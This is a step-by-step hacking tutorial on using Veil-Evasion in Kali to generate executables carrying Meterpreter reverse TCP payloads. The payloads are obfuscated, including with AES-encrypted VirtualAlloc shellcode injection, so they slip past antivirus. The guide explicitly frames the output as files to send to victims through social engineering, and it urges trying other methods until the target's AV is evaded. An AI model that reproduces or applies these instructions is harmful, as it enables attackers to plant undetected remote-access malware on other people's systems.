Evading AV with Veil-Evasion
One of the most important issues any hacker must address is how to get past security devices and remain undetected. These can include antivirus software, intrusion detection systems, firewalls, web application firewalls, and numerous others. As nearly all of these devices employ a signature-based detection scheme where they maintain a database of known exploits and payload signatures, the key is to either:
create your own exploit, or
change the signature of a known exploit or payload.
As creating your own exploit and payload is both time-consuming and requires advanced skills, the novice hacker is better served by first attempting to change the signature of the exploit and payload.
In previous tutorials, we have used both Metasploit's msfpayload/msencode(now deprecated) and msfvenom. In these cases, the AV developers have coded a signature for the templates these schemes use. In this tutorial, we will look at another re-encoding scheme for hiding the signature of known payloads known as Veil-Evasion.
Veil-Evasion was specifically developed to enable you to change the signature of your payload. It is written in Python, but has numerous encoders to enable you to rewrite your code to evade detection in multiple ways.
Step 1: Install Veil-Evasion
We first need to install Veil-Evasion on our system. We can download it from the Kali repository. Simply type:
kali > apt-get install veil-evasion
Step 2: Set Up Veil-Evasion
To start Veil-Evasion, just type:
kali > veil-evasion
When you do so, you will be greeted with this opening screen:
Veil will now begin its installation. It will ask you whether you want to install dependencies; tell it "y" for yes.
Next, Veil-Evasion will begin to download all its dependencies. This can take awhile, so be patient. Eventually, Veil-Evasion will ask you whether you want to install Python for Windows. Select "Install for all users" and click the "Next" button.
Use the default directory when the install wizard asks, and then you will be greeted by a screen like below. Click "Next."
Eventually, you will come to a screen like that below. Go ahead and click "Next" again.
Continue to click "Next" through several screens until you finally come to a window with the "Finish" button. Click it. Eventually, your patience will be rewarded when you finally arrive at the screen below.
Now we are ready to begin to use Veil-Evasion to create a nearly undetectable payload.
Step 3: Create an EXE with a Payload
In this first step, we will create a simple .exe file that will contain a payload that enables us to own the victim's system. This could be used to send to the victim and having them click on it to execute it. Generally, this type of attack will be part of a social engineering attack.
Let's now type "list" as this will list all of the payloads that Veil-Evasion can work with.
Those of you who are familiar with Metasploit will recognize many of these payloads.
Step 4: Use a Payload
In this case, let's use the ruby/meterpreter/rev_tcp, or number 44. Let's type:
> use 44
When we do so, Veil-Evasion will come back with a screen like below asking us to set the options.
We will need to set LHOST and LPORT.
> set LHOST 192.168.1.101
> set LPORT 6996
Of course, use the appropriate IP address and port for your circumstances.
Next, we need to tell Veil-Evasion to generate the executable.
As you can see in the screenshot above, Veil-Evasion has generated an new .exe file that I have named "newpayload.exe" (you can name it whatever you please).
Step 5: Generate an Encrypted Payload to Evade Detection
Next, let's attempt to create an encrypted payload that we can get past AV software and other security devices. In this case, we will use a different payload on the payload list, namely python/shellcode_inject/aes_encrypt. This payload type uses VirtualAlloc injection, which creates a executable area in memory for the shellcode and then locks that memory area in physical memory.
This is number 32 on our payload list, so type:
> info 32
It then returns info on this payload as seen below.
This payload uses VirtualAlloc injection in conjunction with AES encryption (AES is the Advanced Encryption Standard, generally regarded as among the strongest encryption available) to obfuscate its true nature from AV software and other security devices.
Next, let's tell Veil-Evasion we want to use this payload.
> use 32
Here we have the option to change the default options if we care to do so. For now, let's leave the default options as they are.
Next, let's tell Veil-Evasion we want to generate this encrypted payload.
When we do so, it will use the default payload windows/meterpreter/reverse_tcp and then prompt us for the LHOST and LPORT. When we finish entering the appropriate information for our payload, it will begin to generate the shellcode. This can take few minutes, so be patient.
Next, Veil-Evasion will prompt us for what we want to name our payload. You can use whatever name your heart desires, but I used the simple "veilpayload."
Finally, Veil-Evasion will complete its work and present us with the finished product, as we see below.
This new code with the meterpreter embedded within will get past most AV software and security devices. Like anything else, the AV developers will likely find a way to detect even this payload, so be creative and try other payload obfuscation methods in Veil-Evasion until you find one that hides your payload.
Evading security software and devices is among the most important tasks of the hacker, and Veil-Evasion is another tool in our arsenal. Keep in mind, though, that there is NEVER a single, final solution. The hacker must be persistent and creative in finding ways past these devices, so if one method fails, try another, then try another, until you find one that works. In addition, you only need to get past the AV of the target, not all AV. You might be able to determine the target AV use recon-ng and then develop a payload that evades that one AV.